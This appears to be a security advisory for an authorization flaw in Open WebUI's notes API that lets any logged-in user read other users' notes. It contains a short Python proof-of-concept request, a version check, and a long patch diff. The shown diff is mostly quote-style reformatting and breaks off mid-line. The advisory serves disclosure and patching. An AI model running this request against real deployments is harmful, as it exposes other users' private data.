Medium severity · 6.5 · GHSA Advisory · Published May 15, 2026
CVE-2026-45666
Description
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, the /api/v1/notes/{note_id} API endpoint lacks a proper authorization check, allowing any authenticated user to retrieve notes belonging to other users by guessing or enumerating note UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. The vulnerability is fixed in version 0.8.11.
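The flaw is an insecure direct object reference: possession of a note's UUID is treated as sufficient authorization. A minimal sketch of how this could be exercised against an unpatched (<= 0.8.10) instance follows; the base URL, bearer token, and note UUID are placeholders, and a patched instance should reject the request for another user's note rather than serve it.

import requests  # third-party HTTP client, assumed installed

BASE_URL = "https://openwebui.example.com"  # hypothetical deployment
ATTACKER_TOKEN = "<any valid low-privilege session token>"
TARGET_NOTE_ID = "9b1deb4d-3b7d-4bad-9bdd-2b0d7b3dcb6d"  # guessed/enumerated UUID

# Prior to 0.8.11, this returns the note even when it belongs to another
# user; a patched instance should respond with 401/403/404 instead.
resp = requests.get(
    f"{BASE_URL}/api/v1/notes/{TARGET_NOTE_ID}",
    headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"},
    timeout=10,
)
print(resp.status_code)
if resp.ok:
    print(resp.json())  # unauthorized disclosure of another user's note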
Affected products
Open WebUI: versions <= 0.8.10 (patched in 0.8.11)
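For a pip-based install, exposure can be checked by comparing the installed package version against the patched release. This is a small sketch only; the packaging dependency used for the comparison is an assumption, not something the advisory prescribes.

from importlib.metadata import version
from packaging.version import Version  # 'packaging' assumed available

installed = Version(version("open-webui"))
if installed <= Version("0.8.10"):
    print(f"open-webui {installed} is affected: upgrade to 0.8.11 or later")
else:
    print(f"open-webui {installed} already includes the fix")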
Patches
1220 files changed · +16939 −22473
backend/open_webui/config.py+1481 −1800 modifiedbackend/open_webui/constants.py+60 −78 modified@@ -2,125 +2,107 @@ class MESSAGES(str, Enum): - DEFAULT = lambda msg="": f"{msg if msg else ''}" - MODEL_ADDED = lambda model="": f"The model '{model}' has been added successfully." - MODEL_DELETED = ( - lambda model="": f"The model '{model}' has been deleted successfully." - ) + DEFAULT = lambda msg='': f'{msg if msg else ""}' + MODEL_ADDED = lambda model='': f"The model '{model}' has been added successfully." + MODEL_DELETED = lambda model='': f"The model '{model}' has been deleted successfully." class WEBHOOK_MESSAGES(str, Enum): - DEFAULT = lambda msg="": f"{msg if msg else ''}" - USER_SIGNUP = lambda username="": ( - f"New user signed up: {username}" if username else "New user signed up" - ) + DEFAULT = lambda msg='': f'{msg if msg else ""}' + USER_SIGNUP = lambda username='': (f'New user signed up: {username}' if username else 'New user signed up') class ERROR_MESSAGES(str, Enum): def __str__(self) -> str: return super().__str__() - DEFAULT = ( - lambda err="": f'{"Something went wrong :/" if err == "" else "[ERROR: " + str(err) + "]"}' - ) - ENV_VAR_NOT_FOUND = "Required environment variable not found. Terminating now." - CREATE_USER_ERROR = "Oops! Something went wrong while creating your account. Please try again later. If the issue persists, contact support for assistance." - DELETE_USER_ERROR = "Oops! Something went wrong. We encountered an issue while trying to delete the user. Please give it another shot." - EMAIL_MISMATCH = "Uh-oh! This email does not match the email your provider is registered with. Please check your email and try again." - EMAIL_TAKEN = "Uh-oh! This email is already registered. Sign in with your existing account or choose another email to start anew." - USERNAME_TAKEN = ( - "Uh-oh! This username is already registered. Please choose another username." + DEFAULT = lambda err='': f'{"Something went wrong :/" if err == "" else "[ERROR: " + str(err) + "]"}' + ENV_VAR_NOT_FOUND = 'Required environment variable not found. Terminating now.' + CREATE_USER_ERROR = 'Oops! Something went wrong while creating your account. Please try again later. If the issue persists, contact support for assistance.' + DELETE_USER_ERROR = 'Oops! Something went wrong. We encountered an issue while trying to delete the user. Please give it another shot.' + EMAIL_MISMATCH = 'Uh-oh! This email does not match the email your provider is registered with. Please check your email and try again.' + EMAIL_TAKEN = 'Uh-oh! This email is already registered. Sign in with your existing account or choose another email to start anew.' + USERNAME_TAKEN = 'Uh-oh! This username is already registered. Please choose another username.' + PASSWORD_TOO_LONG = ( + 'Uh-oh! The password you entered is too long. Please make sure your password is less than 72 bytes long.' ) - PASSWORD_TOO_LONG = "Uh-oh! The password you entered is too long. Please make sure your password is less than 72 bytes long." - COMMAND_TAKEN = "Uh-oh! This command is already registered. Please choose another command string." - FILE_EXISTS = "Uh-oh! This file is already registered. Please choose another file." + COMMAND_TAKEN = 'Uh-oh! This command is already registered. Please choose another command string.' + FILE_EXISTS = 'Uh-oh! This file is already registered. Please choose another file.' - ID_TAKEN = "Uh-oh! This id is already registered. Please choose another id string." - MODEL_ID_TAKEN = "Uh-oh! This model id is already registered. 
Please choose another model id string." - NAME_TAG_TAKEN = "Uh-oh! This name tag is already registered. Please choose another name tag string." - MODEL_ID_TOO_LONG = "The model id is too long. Please make sure your model id is less than 256 characters long." + ID_TAKEN = 'Uh-oh! This id is already registered. Please choose another id string.' + MODEL_ID_TAKEN = 'Uh-oh! This model id is already registered. Please choose another model id string.' + NAME_TAG_TAKEN = 'Uh-oh! This name tag is already registered. Please choose another name tag string.' + MODEL_ID_TOO_LONG = 'The model id is too long. Please make sure your model id is less than 256 characters long.' - INVALID_TOKEN = ( - "Your session has expired or the token is invalid. Please sign in again." - ) - INVALID_CRED = "The email or password provided is incorrect. Please check for typos and try logging in again." + INVALID_TOKEN = 'Your session has expired or the token is invalid. Please sign in again.' + INVALID_CRED = 'The email or password provided is incorrect. Please check for typos and try logging in again.' INVALID_EMAIL_FORMAT = "The email format you entered is invalid. Please double-check and make sure you're using a valid email address (e.g., yourname@example.com)." - INCORRECT_PASSWORD = ( - "The password provided is incorrect. Please check for typos and try again." + INCORRECT_PASSWORD = 'The password provided is incorrect. Please check for typos and try again.' + INVALID_TRUSTED_HEADER = ( + 'Your provider has not provided a trusted header. Please contact your administrator for assistance.' ) - INVALID_TRUSTED_HEADER = "Your provider has not provided a trusted header. Please contact your administrator for assistance." EXISTING_USERS = "You can't turn off authentication because there are existing users. If you want to disable WEBUI_AUTH, make sure your web interface doesn't have any existing users and is a fresh installation." - UNAUTHORIZED = "401 Unauthorized" - ACCESS_PROHIBITED = "You do not have permission to access this resource. Please contact your administrator for assistance." - ACTION_PROHIBITED = ( - "The requested action has been restricted as a security measure." + UNAUTHORIZED = '401 Unauthorized' + ACCESS_PROHIBITED = ( + 'You do not have permission to access this resource. Please contact your administrator for assistance.' ) + ACTION_PROHIBITED = 'The requested action has been restricted as a security measure.' - FILE_NOT_SENT = "FILE_NOT_SENT" + FILE_NOT_SENT = 'FILE_NOT_SENT' FILE_NOT_SUPPORTED = "Oops! It seems like the file format you're trying to upload is not supported. Please upload a file with a supported format and try again." NOT_FOUND = "We could not find what you're looking for :/" USER_NOT_FOUND = "We could not find what you're looking for :/" API_KEY_NOT_FOUND = "Oops! It looks like there's a hiccup. The API key is missing. Please make sure to provide a valid API key to access this feature." - API_KEY_NOT_ALLOWED = "Use of API key is not enabled in the environment." + API_KEY_NOT_ALLOWED = 'Use of API key is not enabled in the environment.' - MALICIOUS = "Unusual activities detected, please try again in a few minutes." + MALICIOUS = 'Unusual activities detected, please try again in a few minutes.' - PANDOC_NOT_INSTALLED = "Pandoc is not installed on the server. Please contact your administrator for assistance." - INCORRECT_FORMAT = ( - lambda err="": f"Invalid format. 
Please use the correct format{err}" - ) - RATE_LIMIT_EXCEEDED = "API rate limit exceeded" + PANDOC_NOT_INSTALLED = 'Pandoc is not installed on the server. Please contact your administrator for assistance.' + INCORRECT_FORMAT = lambda err='': f'Invalid format. Please use the correct format{err}' + RATE_LIMIT_EXCEEDED = 'API rate limit exceeded' - MODEL_NOT_FOUND = lambda name="": f"Model '{name}' was not found" - OPENAI_NOT_FOUND = lambda name="": "OpenAI API was not found" - OLLAMA_NOT_FOUND = "WebUI could not connect to Ollama" - CREATE_API_KEY_ERROR = "Oops! Something went wrong while creating your API key. Please try again later. If the issue persists, contact support for assistance." - API_KEY_CREATION_NOT_ALLOWED = "API key creation is not allowed in the environment." + MODEL_NOT_FOUND = lambda name='': f"Model '{name}' was not found" + OPENAI_NOT_FOUND = lambda name='': 'OpenAI API was not found' + OLLAMA_NOT_FOUND = 'WebUI could not connect to Ollama' + CREATE_API_KEY_ERROR = 'Oops! Something went wrong while creating your API key. Please try again later. If the issue persists, contact support for assistance.' + API_KEY_CREATION_NOT_ALLOWED = 'API key creation is not allowed in the environment.' - EMPTY_CONTENT = "The content provided is empty. Please ensure that there is text or data present before proceeding." + EMPTY_CONTENT = 'The content provided is empty. Please ensure that there is text or data present before proceeding.' - DB_NOT_SQLITE = "This feature is only available when running with SQLite databases." + DB_NOT_SQLITE = 'This feature is only available when running with SQLite databases.' - INVALID_URL = ( - "Oops! The URL you provided is invalid. Please double-check and try again." - ) + INVALID_URL = 'Oops! The URL you provided is invalid. Please double-check and try again.' - WEB_SEARCH_ERROR = ( - lambda err="": f"{err if err else 'Oops! Something went wrong while searching the web.'}" - ) + WEB_SEARCH_ERROR = lambda err='': f'{err if err else "Oops! Something went wrong while searching the web."}' - OLLAMA_API_DISABLED = ( - "The Ollama API is disabled. Please enable it to use this feature." - ) + OLLAMA_API_DISABLED = 'The Ollama API is disabled. Please enable it to use this feature.' FILE_TOO_LARGE = ( - lambda size="": f"Oops! The file you're trying to upload is too large. Please upload a file that is less than {size}." + lambda size='': f"Oops! The file you're trying to upload is too large. Please upload a file that is less than {size}." ) - DUPLICATE_CONTENT = ( - "Duplicate content detected. Please provide unique content to proceed." + DUPLICATE_CONTENT = 'Duplicate content detected. Please provide unique content to proceed.' + FILE_NOT_PROCESSED = ( + 'Extracted content is not available for this file. Please ensure that the file is processed before proceeding.' ) - FILE_NOT_PROCESSED = "Extracted content is not available for this file. Please ensure that the file is processed before proceeding." - INVALID_PASSWORD = lambda err="": ( - err if err else "The password does not meet the required validation criteria." 
- ) + INVALID_PASSWORD = lambda err='': (err if err else 'The password does not meet the required validation criteria.') class TASKS(str, Enum): def __str__(self) -> str: return super().__str__() - DEFAULT = lambda task="": f"{task if task else 'generation'}" - TITLE_GENERATION = "title_generation" - FOLLOW_UP_GENERATION = "follow_up_generation" - TAGS_GENERATION = "tags_generation" - EMOJI_GENERATION = "emoji_generation" - QUERY_GENERATION = "query_generation" - IMAGE_PROMPT_GENERATION = "image_prompt_generation" - AUTOCOMPLETE_GENERATION = "autocomplete_generation" - FUNCTION_CALLING = "function_calling" - MOA_RESPONSE_GENERATION = "moa_response_generation" + DEFAULT = lambda task='': f'{task if task else "generation"}' + TITLE_GENERATION = 'title_generation' + FOLLOW_UP_GENERATION = 'follow_up_generation' + TAGS_GENERATION = 'tags_generation' + EMOJI_GENERATION = 'emoji_generation' + QUERY_GENERATION = 'query_generation' + IMAGE_PROMPT_GENERATION = 'image_prompt_generation' + AUTOCOMPLETE_GENERATION = 'autocomplete_generation' + FUNCTION_CALLING = 'function_calling' + MOA_RESPONSE_GENERATION = 'moa_response_generation'
backend/open_webui/env.py+279 −428 modified@@ -37,37 +37,34 @@ try: from dotenv import find_dotenv, load_dotenv - load_dotenv(find_dotenv(str(BASE_DIR / ".env"))) + load_dotenv(find_dotenv(str(BASE_DIR / '.env'))) except ImportError: - print("dotenv not installed, skipping...") + print('dotenv not installed, skipping...') -DOCKER = os.environ.get("DOCKER", "False").lower() == "true" +DOCKER = os.environ.get('DOCKER', 'False').lower() == 'true' # device type embedding models - "cpu" (default), "cuda" (nvidia gpu required) or "mps" (apple silicon) - choosing this right can lead to better performance -USE_CUDA = os.environ.get("USE_CUDA_DOCKER", "false") +USE_CUDA = os.environ.get('USE_CUDA_DOCKER', 'false') -if USE_CUDA.lower() == "true": +if USE_CUDA.lower() == 'true': try: import torch - assert torch.cuda.is_available(), "CUDA not available" - DEVICE_TYPE = "cuda" + assert torch.cuda.is_available(), 'CUDA not available' + DEVICE_TYPE = 'cuda' except Exception as e: - cuda_error = ( - "Error when testing CUDA but USE_CUDA_DOCKER is true. " - f"Resetting USE_CUDA_DOCKER to false: {e}" - ) - os.environ["USE_CUDA_DOCKER"] = "false" - USE_CUDA = "false" - DEVICE_TYPE = "cpu" + cuda_error = f'Error when testing CUDA but USE_CUDA_DOCKER is true. Resetting USE_CUDA_DOCKER to false: {e}' + os.environ['USE_CUDA_DOCKER'] = 'false' + USE_CUDA = 'false' + DEVICE_TYPE = 'cpu' else: - DEVICE_TYPE = "cpu" + DEVICE_TYPE = 'cpu' try: import torch if torch.backends.mps.is_available() and torch.backends.mps.is_built(): - DEVICE_TYPE = "mps" + DEVICE_TYPE = 'mps' except Exception: pass @@ -76,11 +73,11 @@ #################################### _LEVEL_MAP = { - "DEBUG": "debug", - "INFO": "info", - "WARNING": "warn", - "ERROR": "error", - "CRITICAL": "fatal", + 'DEBUG': 'debug', + 'INFO': 'info', + 'WARNING': 'warn', + 'ERROR': 'error', + 'CRITICAL': 'fatal', } @@ -89,132 +86,128 @@ class JSONFormatter(logging.Formatter): def format(self, record: logging.LogRecord) -> str: log_entry: dict[str, Any] = { - "ts": datetime.fromtimestamp(record.created, tz=timezone.utc).isoformat( - timespec="milliseconds" - ), - "level": _LEVEL_MAP.get(record.levelname, record.levelname.lower()), - "msg": record.getMessage(), - "caller": record.name, + 'ts': datetime.fromtimestamp(record.created, tz=timezone.utc).isoformat(timespec='milliseconds'), + 'level': _LEVEL_MAP.get(record.levelname, record.levelname.lower()), + 'msg': record.getMessage(), + 'caller': record.name, } if record.exc_info and record.exc_info[0] is not None: - log_entry["error"] = "".join( - traceback.format_exception(*record.exc_info) - ).rstrip() + log_entry['error'] = ''.join(traceback.format_exception(*record.exc_info)).rstrip() elif record.exc_text: - log_entry["error"] = record.exc_text + log_entry['error'] = record.exc_text if record.stack_info: - log_entry["stacktrace"] = record.stack_info + log_entry['stacktrace'] = record.stack_info return json.dumps(log_entry, ensure_ascii=False, default=str) -LOG_FORMAT = os.environ.get("LOG_FORMAT", "").lower() +LOG_FORMAT = os.environ.get('LOG_FORMAT', '').lower() -GLOBAL_LOG_LEVEL = os.environ.get("GLOBAL_LOG_LEVEL", "").upper() +GLOBAL_LOG_LEVEL = os.environ.get('GLOBAL_LOG_LEVEL', '').upper() if GLOBAL_LOG_LEVEL in logging.getLevelNamesMapping(): - if LOG_FORMAT == "json": + if LOG_FORMAT == 'json': _handler = logging.StreamHandler(sys.stdout) _handler.setFormatter(JSONFormatter()) logging.basicConfig(handlers=[_handler], level=GLOBAL_LOG_LEVEL, force=True) else: logging.basicConfig(stream=sys.stdout, 
level=GLOBAL_LOG_LEVEL, force=True) else: - GLOBAL_LOG_LEVEL = "INFO" + GLOBAL_LOG_LEVEL = 'INFO' log = logging.getLogger(__name__) -log.info(f"GLOBAL_LOG_LEVEL: {GLOBAL_LOG_LEVEL}") +log.info(f'GLOBAL_LOG_LEVEL: {GLOBAL_LOG_LEVEL}') -if "cuda_error" in locals(): +if 'cuda_error' in locals(): log.exception(cuda_error) del cuda_error SRC_LOG_LEVELS = {} # Legacy variable, do not remove -WEBUI_NAME = os.environ.get("WEBUI_NAME", "Open WebUI") -if WEBUI_NAME != "Open WebUI": - WEBUI_NAME += " (Open WebUI)" +WEBUI_NAME = os.environ.get('WEBUI_NAME', 'Open WebUI') +if WEBUI_NAME != 'Open WebUI': + WEBUI_NAME += ' (Open WebUI)' -WEBUI_FAVICON_URL = "https://openwebui.com/favicon.png" +WEBUI_FAVICON_URL = 'https://openwebui.com/favicon.png' -TRUSTED_SIGNATURE_KEY = os.environ.get("TRUSTED_SIGNATURE_KEY", "") +TRUSTED_SIGNATURE_KEY = os.environ.get('TRUSTED_SIGNATURE_KEY', '') #################################### # ENV (dev,test,prod) #################################### -ENV = os.environ.get("ENV", "dev") +ENV = os.environ.get('ENV', 'dev') -FROM_INIT_PY = os.environ.get("FROM_INIT_PY", "False").lower() == "true" +FROM_INIT_PY = os.environ.get('FROM_INIT_PY', 'False').lower() == 'true' if FROM_INIT_PY: - PACKAGE_DATA = {"version": importlib.metadata.version("open-webui")} + PACKAGE_DATA = {'version': importlib.metadata.version('open-webui')} else: try: - PACKAGE_DATA = json.loads((BASE_DIR / "package.json").read_text()) + PACKAGE_DATA = json.loads((BASE_DIR / 'package.json').read_text()) except Exception: - PACKAGE_DATA = {"version": "0.0.0"} + PACKAGE_DATA = {'version': '0.0.0'} -VERSION = PACKAGE_DATA["version"] +VERSION = PACKAGE_DATA['version'] -DEPLOYMENT_ID = os.environ.get("DEPLOYMENT_ID", "") -INSTANCE_ID = os.environ.get("INSTANCE_ID", str(uuid4())) +DEPLOYMENT_ID = os.environ.get('DEPLOYMENT_ID', '') +INSTANCE_ID = os.environ.get('INSTANCE_ID', str(uuid4())) -ENABLE_DB_MIGRATIONS = os.environ.get("ENABLE_DB_MIGRATIONS", "True").lower() == "true" +ENABLE_DB_MIGRATIONS = os.environ.get('ENABLE_DB_MIGRATIONS', 'True').lower() == 'true' # Function to parse each section def parse_section(section): items = [] - for li in section.find_all("li"): + for li in section.find_all('li'): # Extract raw HTML string raw_html = str(li) # Extract text without HTML tags - text = li.get_text(separator=" ", strip=True) + text = li.get_text(separator=' ', strip=True) # Split into title and content - parts = text.split(": ", 1) - title = parts[0].strip() if len(parts) > 1 else "" + parts = text.split(': ', 1) + title = parts[0].strip() if len(parts) > 1 else '' content = parts[1].strip() if len(parts) > 1 else text - items.append({"title": title, "content": content, "raw": raw_html}) + items.append({'title': title, 'content': content, 'raw': raw_html}) return items try: - changelog_path = BASE_DIR / "CHANGELOG.md" - with open(str(changelog_path.absolute()), "r", encoding="utf8") as file: + changelog_path = BASE_DIR / 'CHANGELOG.md' + with open(str(changelog_path.absolute()), 'r', encoding='utf8') as file: changelog_content = file.read() except Exception: - changelog_content = (pkgutil.get_data("open_webui", "CHANGELOG.md") or b"").decode() + changelog_content = (pkgutil.get_data('open_webui', 'CHANGELOG.md') or b'').decode() # Convert markdown content to HTML html_content = markdown.markdown(changelog_content) # Parse the HTML content -soup = BeautifulSoup(html_content, "html.parser") +soup = BeautifulSoup(html_content, 'html.parser') # Initialize JSON structure changelog_json = {} # Iterate over each version 
-for version in soup.find_all("h2"): - version_number = version.get_text().strip().split(" - ")[0][1:-1] # Remove brackets - date = version.get_text().strip().split(" - ")[1] +for version in soup.find_all('h2'): + version_number = version.get_text().strip().split(' - ')[0][1:-1] # Remove brackets + date = version.get_text().strip().split(' - ')[1] - version_data = {"date": date} + version_data = {'date': date} # Find the next sibling that is a h3 tag (section title) current = version.find_next_sibling() - while current and current.name != "h2": - if current.name == "h3": + while current and current.name != 'h2': + if current.name == 'h3': section_title = current.get_text().lower() # e.g., "added", "fixed" - section_items = parse_section(current.find_next_sibling("ul")) + section_items = parse_section(current.find_next_sibling('ul')) version_data[section_title] = section_items # Move to the next element @@ -228,65 +221,51 @@ def parse_section(section): # SAFE_MODE #################################### -SAFE_MODE = os.environ.get("SAFE_MODE", "false").lower() == "true" +SAFE_MODE = os.environ.get('SAFE_MODE', 'false').lower() == 'true' #################################### # ENABLE_FORWARD_USER_INFO_HEADERS #################################### -ENABLE_FORWARD_USER_INFO_HEADERS = ( - os.environ.get("ENABLE_FORWARD_USER_INFO_HEADERS", "False").lower() == "true" -) +ENABLE_FORWARD_USER_INFO_HEADERS = os.environ.get('ENABLE_FORWARD_USER_INFO_HEADERS', 'False').lower() == 'true' # Header names for user info forwarding (customizable via environment variables) -FORWARD_USER_INFO_HEADER_USER_NAME = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_NAME", "X-OpenWebUI-User-Name" -) -FORWARD_USER_INFO_HEADER_USER_ID = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_ID", "X-OpenWebUI-User-Id" -) -FORWARD_USER_INFO_HEADER_USER_EMAIL = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_EMAIL", "X-OpenWebUI-User-Email" -) -FORWARD_USER_INFO_HEADER_USER_ROLE = os.environ.get( - "FORWARD_USER_INFO_HEADER_USER_ROLE", "X-OpenWebUI-User-Role" -) +FORWARD_USER_INFO_HEADER_USER_NAME = os.environ.get('FORWARD_USER_INFO_HEADER_USER_NAME', 'X-OpenWebUI-User-Name') +FORWARD_USER_INFO_HEADER_USER_ID = os.environ.get('FORWARD_USER_INFO_HEADER_USER_ID', 'X-OpenWebUI-User-Id') +FORWARD_USER_INFO_HEADER_USER_EMAIL = os.environ.get('FORWARD_USER_INFO_HEADER_USER_EMAIL', 'X-OpenWebUI-User-Email') +FORWARD_USER_INFO_HEADER_USER_ROLE = os.environ.get('FORWARD_USER_INFO_HEADER_USER_ROLE', 'X-OpenWebUI-User-Role') # Header name for chat ID forwarding (customizable via environment variable) FORWARD_SESSION_INFO_HEADER_MESSAGE_ID = os.environ.get( - "FORWARD_SESSION_INFO_HEADER_MESSAGE_ID", "X-OpenWebUI-Message-Id" -) -FORWARD_SESSION_INFO_HEADER_CHAT_ID = os.environ.get( - "FORWARD_SESSION_INFO_HEADER_CHAT_ID", "X-OpenWebUI-Chat-Id" + 'FORWARD_SESSION_INFO_HEADER_MESSAGE_ID', 'X-OpenWebUI-Message-Id' ) +FORWARD_SESSION_INFO_HEADER_CHAT_ID = os.environ.get('FORWARD_SESSION_INFO_HEADER_CHAT_ID', 'X-OpenWebUI-Chat-Id') # Experimental feature, may be removed in future -ENABLE_STAR_SESSIONS_MIDDLEWARE = ( - os.environ.get("ENABLE_STAR_SESSIONS_MIDDLEWARE", "False").lower() == "true" -) +ENABLE_STAR_SESSIONS_MIDDLEWARE = os.environ.get('ENABLE_STAR_SESSIONS_MIDDLEWARE', 'False').lower() == 'true' -ENABLE_EASTER_EGGS = os.environ.get("ENABLE_EASTER_EGGS", "True").lower() == "true" +ENABLE_EASTER_EGGS = os.environ.get('ENABLE_EASTER_EGGS', 'True').lower() == 'true' #################################### # WEBUI_BUILD_HASH 
#################################### -WEBUI_BUILD_HASH = os.environ.get("WEBUI_BUILD_HASH", "dev-build") +WEBUI_BUILD_HASH = os.environ.get('WEBUI_BUILD_HASH', 'dev-build') #################################### # DATA/FRONTEND BUILD DIR #################################### -DATA_DIR = Path(os.getenv("DATA_DIR", BACKEND_DIR / "data")).resolve() +DATA_DIR = Path(os.getenv('DATA_DIR', BACKEND_DIR / 'data')).resolve() if FROM_INIT_PY: - NEW_DATA_DIR = Path(os.getenv("DATA_DIR", OPEN_WEBUI_DIR / "data")).resolve() + NEW_DATA_DIR = Path(os.getenv('DATA_DIR', OPEN_WEBUI_DIR / 'data')).resolve() NEW_DATA_DIR.mkdir(parents=True, exist_ok=True) # Check if the data directory exists in the package directory if DATA_DIR.exists() and DATA_DIR != NEW_DATA_DIR: - log.info(f"Moving {DATA_DIR} to {NEW_DATA_DIR}") + log.info(f'Moving {DATA_DIR} to {NEW_DATA_DIR}') for item in DATA_DIR.iterdir(): dest = NEW_DATA_DIR / item.name if item.is_dir(): @@ -295,157 +274,143 @@ def parse_section(section): shutil.copy2(item, dest) # Zip the data directory - shutil.make_archive(DATA_DIR.parent / "open_webui_data", "zip", DATA_DIR) + shutil.make_archive(DATA_DIR.parent / 'open_webui_data', 'zip', DATA_DIR) # Remove the old data directory shutil.rmtree(DATA_DIR) - DATA_DIR = Path(os.getenv("DATA_DIR", OPEN_WEBUI_DIR / "data")) + DATA_DIR = Path(os.getenv('DATA_DIR', OPEN_WEBUI_DIR / 'data')) -STATIC_DIR = Path(os.getenv("STATIC_DIR", OPEN_WEBUI_DIR / "static")) +STATIC_DIR = Path(os.getenv('STATIC_DIR', OPEN_WEBUI_DIR / 'static')) -FONTS_DIR = Path(os.getenv("FONTS_DIR", OPEN_WEBUI_DIR / "static" / "fonts")) +FONTS_DIR = Path(os.getenv('FONTS_DIR', OPEN_WEBUI_DIR / 'static' / 'fonts')) -FRONTEND_BUILD_DIR = Path(os.getenv("FRONTEND_BUILD_DIR", BASE_DIR / "build")).resolve() +FRONTEND_BUILD_DIR = Path(os.getenv('FRONTEND_BUILD_DIR', BASE_DIR / 'build')).resolve() if FROM_INIT_PY: - FRONTEND_BUILD_DIR = Path( - os.getenv("FRONTEND_BUILD_DIR", OPEN_WEBUI_DIR / "frontend") - ).resolve() + FRONTEND_BUILD_DIR = Path(os.getenv('FRONTEND_BUILD_DIR', OPEN_WEBUI_DIR / 'frontend')).resolve() #################################### # Database #################################### # Check if the file exists -if os.path.exists(f"{DATA_DIR}/ollama.db"): +if os.path.exists(f'{DATA_DIR}/ollama.db'): # Rename the file - os.rename(f"{DATA_DIR}/ollama.db", f"{DATA_DIR}/webui.db") - log.info("Database migrated from Ollama-WebUI successfully.") + os.rename(f'{DATA_DIR}/ollama.db', f'{DATA_DIR}/webui.db') + log.info('Database migrated from Ollama-WebUI successfully.') else: pass -DATABASE_URL = os.environ.get("DATABASE_URL", f"sqlite:///{DATA_DIR}/webui.db") +DATABASE_URL = os.environ.get('DATABASE_URL', f'sqlite:///{DATA_DIR}/webui.db') -DATABASE_TYPE = os.environ.get("DATABASE_TYPE") -DATABASE_USER = os.environ.get("DATABASE_USER") -DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD") +DATABASE_TYPE = os.environ.get('DATABASE_TYPE') +DATABASE_USER = os.environ.get('DATABASE_USER') +DATABASE_PASSWORD = os.environ.get('DATABASE_PASSWORD') -DATABASE_CRED = "" +DATABASE_CRED = '' if DATABASE_USER: - DATABASE_CRED += f"{DATABASE_USER}" + DATABASE_CRED += f'{DATABASE_USER}' if DATABASE_PASSWORD: - DATABASE_CRED += f":{DATABASE_PASSWORD}" + DATABASE_CRED += f':{DATABASE_PASSWORD}' DB_VARS = { - "db_type": DATABASE_TYPE, - "db_cred": DATABASE_CRED, - "db_host": os.environ.get("DATABASE_HOST"), - "db_port": os.environ.get("DATABASE_PORT"), - "db_name": os.environ.get("DATABASE_NAME"), + 'db_type': DATABASE_TYPE, + 'db_cred': DATABASE_CRED, + 'db_host': 
os.environ.get('DATABASE_HOST'), + 'db_port': os.environ.get('DATABASE_PORT'), + 'db_name': os.environ.get('DATABASE_NAME'), } if all(DB_VARS.values()): - DATABASE_URL = f"{DB_VARS['db_type']}://{DB_VARS['db_cred']}@{DB_VARS['db_host']}:{DB_VARS['db_port']}/{DB_VARS['db_name']}" -elif DATABASE_TYPE == "sqlite+sqlcipher" and not os.environ.get("DATABASE_URL"): + DATABASE_URL = ( + f'{DB_VARS["db_type"]}://{DB_VARS["db_cred"]}@{DB_VARS["db_host"]}:{DB_VARS["db_port"]}/{DB_VARS["db_name"]}' + ) +elif DATABASE_TYPE == 'sqlite+sqlcipher' and not os.environ.get('DATABASE_URL'): # Handle SQLCipher with local file when DATABASE_URL wasn't explicitly set - DATABASE_URL = f"sqlite+sqlcipher:///{DATA_DIR}/webui.db" + DATABASE_URL = f'sqlite+sqlcipher:///{DATA_DIR}/webui.db' # Replace the postgres:// with postgresql:// -if "postgres://" in DATABASE_URL: - DATABASE_URL = DATABASE_URL.replace("postgres://", "postgresql://") +if 'postgres://' in DATABASE_URL: + DATABASE_URL = DATABASE_URL.replace('postgres://', 'postgresql://') -DATABASE_SCHEMA = os.environ.get("DATABASE_SCHEMA", None) +DATABASE_SCHEMA = os.environ.get('DATABASE_SCHEMA', None) -DATABASE_POOL_SIZE = os.environ.get("DATABASE_POOL_SIZE", None) +DATABASE_POOL_SIZE = os.environ.get('DATABASE_POOL_SIZE', None) if DATABASE_POOL_SIZE != None: try: DATABASE_POOL_SIZE = int(DATABASE_POOL_SIZE) except Exception: DATABASE_POOL_SIZE = None -DATABASE_POOL_MAX_OVERFLOW = os.environ.get("DATABASE_POOL_MAX_OVERFLOW", 0) +DATABASE_POOL_MAX_OVERFLOW = os.environ.get('DATABASE_POOL_MAX_OVERFLOW', 0) -if DATABASE_POOL_MAX_OVERFLOW == "": +if DATABASE_POOL_MAX_OVERFLOW == '': DATABASE_POOL_MAX_OVERFLOW = 0 else: try: DATABASE_POOL_MAX_OVERFLOW = int(DATABASE_POOL_MAX_OVERFLOW) except Exception: DATABASE_POOL_MAX_OVERFLOW = 0 -DATABASE_POOL_TIMEOUT = os.environ.get("DATABASE_POOL_TIMEOUT", 30) +DATABASE_POOL_TIMEOUT = os.environ.get('DATABASE_POOL_TIMEOUT', 30) -if DATABASE_POOL_TIMEOUT == "": +if DATABASE_POOL_TIMEOUT == '': DATABASE_POOL_TIMEOUT = 30 else: try: DATABASE_POOL_TIMEOUT = int(DATABASE_POOL_TIMEOUT) except Exception: DATABASE_POOL_TIMEOUT = 30 -DATABASE_POOL_RECYCLE = os.environ.get("DATABASE_POOL_RECYCLE", 3600) +DATABASE_POOL_RECYCLE = os.environ.get('DATABASE_POOL_RECYCLE', 3600) -if DATABASE_POOL_RECYCLE == "": +if DATABASE_POOL_RECYCLE == '': DATABASE_POOL_RECYCLE = 3600 else: try: DATABASE_POOL_RECYCLE = int(DATABASE_POOL_RECYCLE) except Exception: DATABASE_POOL_RECYCLE = 3600 -DATABASE_ENABLE_SQLITE_WAL = ( - os.environ.get("DATABASE_ENABLE_SQLITE_WAL", "False").lower() == "true" -) +DATABASE_ENABLE_SQLITE_WAL = os.environ.get('DATABASE_ENABLE_SQLITE_WAL', 'False').lower() == 'true' -DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = os.environ.get( - "DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL", None -) +DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = os.environ.get('DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL', None) if DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL is not None: try: - DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = float( - DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL - ) + DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = 